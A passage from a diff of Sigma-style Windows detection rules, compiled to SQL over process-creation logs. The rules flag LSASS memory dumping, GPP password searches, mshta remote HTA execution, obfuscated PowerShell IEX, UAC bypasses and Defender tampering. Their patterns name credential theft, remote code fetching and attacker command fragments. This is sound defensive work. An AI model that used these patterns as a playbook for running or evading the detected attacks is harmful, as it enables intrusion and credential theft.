This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.006" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.005" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "status": "test", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a 
suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "status": "test", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "description": "Detects 
KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - 
"id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects attempts to remove windows defender configuration 
using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", 
@@ -9499,798 +9243,736 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR 
(Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + ], + "filename": "proc_creation_win_pua_process_hacker.yml" + }, + { + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR 
CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Schedule Types", 
+ "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "status": "experimental", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. 
For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR 
CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND 
Channel = 'Security' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND 
